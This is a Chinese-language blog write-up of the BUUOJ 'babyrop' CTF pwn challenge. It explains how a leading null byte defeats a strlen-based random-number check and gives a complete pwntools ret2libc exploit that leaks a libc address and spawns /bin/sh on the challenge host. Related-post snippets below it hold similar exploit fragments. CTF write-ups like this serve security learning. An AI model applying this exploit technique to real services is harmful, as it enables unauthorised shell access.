Buuoj Pwn

于 2022-05-22 12:56:23 发布
阅读量311 收藏 2
点赞数 6
文章标签: 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/VisualNull/article/details/124909255
版权

babyrop WP

一道比较简单的ret2libc

考察点为strlen函数遇到\x00返回

但是有一个坑

IDA逆向拿到伪代码

main函数

 

逻辑是程序开始运行时读入一个随机数

然后传给并调用sub_804871F函数

sub_804871F函数

 

a1为main函数传入的随机数(buff)

格式化后将a1给了s

之后从终端读入数据给buf

然后将数组buf的某个元素变为0(这是一个坑)

之后获取buf的长度(strlen函数)

这里是第一个利用点:strlen函数遇到\x00则返回

然后根据strlen函数拿到的长度将buf与s比较

不同则程序退出

相同则将buf数组的第八个元素的值变为整数并返回

利用:可以将\x00作为第一个字节传入 使strlen返回长度为0 让后面的比较函数比较0个字节 即可绕过随机数

回到main函数

将返回值赋给v2

然后将v2作为参数传给sub_80487D0函数

sub_80487D0函数

可以看到

只要我们控制了a1的值

就能实现溢出

传入/xff即可

所以整体思路

读入\x00绕过随机数 同时传入\xff实现溢出 然后泄露write函数的got表地址 之后计算libc基地址

避坑:

 

 

正常情况下 我们会这样构造payload

'b\x00'+b'\xff'*7

利用红色框和黑色框中的代码

来实现绕过随机数并实现溢出

但是由于蓝色框的代码

如果我们这样传入8个字节

导致v5=8

使buf[7]=0

即buf的第八个元素被替换成了0

无法实现溢出

因此我们可以用senline()加入回车符达到v5=9或者是多传几个\xff

具体wp如下:

from pwn import *
#context.log_level = 'debug' 
#sh=process("./pwn")
sh=remote("node4.buuoj.cn",29053)
elf=ELF("./pwn")
write_got=elf.got['write']
write_plt=elf.plt['write']
main=0x8048825
#gdb.attach(sh,"b 0x08048825")
payload=b'\x00'+b'\xff'*7
sh.sendline(payload)#sendline()用来避坑 当然也可以传入更多\xff来避坑 道理一样
sh.recvuntil("Correct\n")
#32位传参
#write(1,write_got,4)
​
payload2=b'a'*0xe7+b'b'*0x4+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4)
sh.sendline(payload2)
write=u32(sh.recv(4))
success(hex(write))
​
libc=ELF("./libc-2.23.so")
libc_base=write-libc.symbols["write"]
shell=libc_base+libc.symbols["system"]
binsh=libc_base+libc.search(b'/bin/sh').__next__()
sh.sendline(payload)
sh.recvuntil("Correct\n")
​
payload3=b'a'*0xe7+b'b'*0x4+p32(shell)+p32(0000)+p32(binsh)#0000是system函数的retAddress
sh.sendline(payload3)
​
sh.interactive()

拿到shell

 

Visua1NULL
关注
BUUOJ PWN [ZJCTF 2019]Login
weixin_50287973的博客
11-18 390
输入这些断了下来 是在call rax那断了下来,追踪一下rax [rbp+var_130]的地址作为参数传入User::read_password(void),rax的值赋给了[rbp+var_130] 在password_checker()看看rax怎么来的 这样的话控制[rbp+var_18]为Admin::shell地址就可以了 输入password覆盖到[rbp+var_18] 0x60-0x18=72=14+58 由于_snprintf函数,写入的不含一定0字符的password格式
BUUOJ PWN 61-80
2h4ox1n9
12-17 285
61\
CTF中的PWN——srand()/rand()漏洞(栈溢出)
壊壊的诱惑你的博客
11-16 5061
摘要: 本以为自己栈溢出学的不错了,挑战了一下攻防世界的PWN高手进阶,发现栈溢出还是有很多相关的漏洞,今天总结一下srand()函数的漏洞。 srand()/rand(): 简单介绍一下这两个函数rand()函数是使用线性同余法做的,它并不是真的随机数,因为其周期特别长,所以在一定范围内可以看成随机的。 srand()为初始化随机数发生器,用于设置rand...
buuoj pwn
FFY's Blog
10-07 1093
ret2text rip pwntools gdb 调试 gdb.debug(’./xxx’) pause() 在弹出窗口设好断点,用 python 传递不可打印字符 堆栈平衡,简单溢出 from pwn import * #context.log_level='debug' #p=remote('node3.buuoj.cn',27864) #p=gdb.debug('./pwn1') #pause() target_addr=0x401186 ret_addr=0x401016 pay='a'*(
pwn学习-BUUOJ(一)
qq_45653588的博客
12-20 563
文章目录0x00 test_your_nc0X01 rip0x02 warmup_csaw_20160x03 pwn1_sctf_20160x04 ciscn_2019_n_1 0x00 test_your_nc 下载文件查看,直接就给了shell,没什么好说的,直接连上就行了。 int __cdecl main(int argc, const char **argv, const char **envp) { system("/bin/sh"); return 0; } 0X01 rip 下载文
BUUOj PWN 121-140
2h4ox1n9
12-17 146
121、ciscn_2019_final_5 122、picoctf_2018_are you root 123、[BJDCTF 2nd]diff 124、bjdctf_2020_YDSneedGrirlfriend 125、judgement_mna_2016 126、gyctf_2020_document 127、护网杯_2018_gettingstart 128、xman_2019_format
buuoj Pwn wp 1-10
yongbaoii的博客
01-09 696
01 test_your_nc 直接连上就好了。 然后 cat flag 。 02 rip ret2text. 这多多少少有点问。 IDA里面是这样的,但是exp一直有问,然后试着连上直接跑,是这样的。 栈溢出到返回地址就行。 from pwn import* r = remote("node3.buuoj.cn",26737) context.log_level = "debug" system_addr = 0x401187 payload = 'a' * 23 + p64(syste
buuoj-Pwn-刷记录
Do1phln的博客
10-30 333
warmup_csaw_2016 目直接给出了函数位置,所以很明显就是要利用gets,gets参数的长度为0x40,所以我们再加上返回地址的8个字节,溢出的总长度为0x48,运行时候可以看出sub_40060D的地址就是它的名字,因此我们可以构建payload payload = b'a'*0x48+p64(0x40060D) 即可得到flag ciscn_2019_n_1 打开目可知大致意思是main函数里面调用了一过func函数,其中要输入v1,但是要判断v2,所以就很明显是需要输入长字符串覆盖到
【CTF解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1374
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
BUUCTF pwn rip
weixin_55190422的博客
11-03 367
现在开始是记录我个人对BUUPWN的刷记录。 首先是一个ELF文件,放到Linux里面来看。 首先老套路checksec一下 接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段 我们发现里面有个系统调用函数。我们查看下汇编代码 我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数 所以payload: from pwn import * p = remote('node4.buuoj.cn',...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
https://buuoj.cn/challenges Pwn类,[BJDCTF 2nd]rci 下载rci文件 思路 老规矩使用file和checksec查看文件 全保! 程序可以执行两次system,第一次执行的时候在sh的工作目录位于/tmp下一个随机的文件夹,用 ...
buuoj Pwn writeup 241-245
yongbaoii的博客
08-31 347
241 [GKCTF 2021]checkin 逻辑也比较简单。 首先输入密码的时候可以有个溢出,但是只能溢出八个字节,就只能是做一个栈迁移。 然后有个检查,首先你的名字需要是admin,然后你的密码要走一个函数。 我们去看看那个函数。 好像很复杂。 0x4007f6那个函数点开。 瞬间明白是一个md5. 所以逻辑很简单,我们输入的密码通过md5加密之后要跟v4吻合。 我们发现密码admin的md5加密结果是那个。 所以就直接栈迁移就行。 栈迁移呢需要我们在bss上写东西,输入用户名可以做到,然后呢还
buuoj Pwn writeup 271-275
yongbaoii的博客
09-06 349
271 espcially_tu_2016 就是一个栈溢出。 但是这个最麻烦的是他scanf之后居然缓冲区里面有一个回车,导致我们gets的时候失败了,所以我们就gets了两次。 为了看看是scanf的问还是ios_c99scanf的问,做了个小实验。 编译的时候记得加-std=c89 但是发现scanf也是一样的效果。 就是会留下一个回车。 那我们试试读入字符串。 还是会有一个回车。 那我们下面再放一个scanf 再走第二个scanf的时候会刷新缓冲区的指针。 那如果放的是gets 跑程序的时
buuoj Pwn writeup 211-215
yongbaoii的博客
08-31 422
211 rootersctf_2019_babypwn 说白了就个栈溢出。 exp from pwn import* context.log_level = "debug" r = remote('node4.buuoj.cn', 27601) #r = process("./211") elf = ELF('./211') libc = ELF('./64/libc-2.27.so') puts_plt = elf.plt['puts'] puts_got = elf.got['puts']
buuoj Pwn writeup 66-70
yongbaoii的博客
02-23 308
66 ciscn_2019_final_3 保护 67 mrctf2020_shellcode 保护 68 hitcontraining_magicheap 保护 69 pwnable_start 保护 70 wustctf2020_getshell_2 保护
BUU PWN(一)
playmaker的博客
01-28 2211
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
pwn堆利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5374
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn堆利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn中的利用。一般来说,想到使用IO_FILE结构,是因为pwn中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在堆中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
BUUCTF PWN学习之旅——二进制拼图(持续更新)
zjnu_y3s的博客
11-15 344
BUUCTF PWN学习之旅——二进制拼图(持续更新) get_started_3dsctf_2016
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 446
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
buuoj Pwn writeup 116-120
yongbaoii的博客
05-11 279
116 roarctf_2019_realloc_magic 117 [BJDCTF 2nd]rci 118 wustctf2020_number_game 119 picoctf_2018_are you root 120 [GKCTF2020]Domo
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值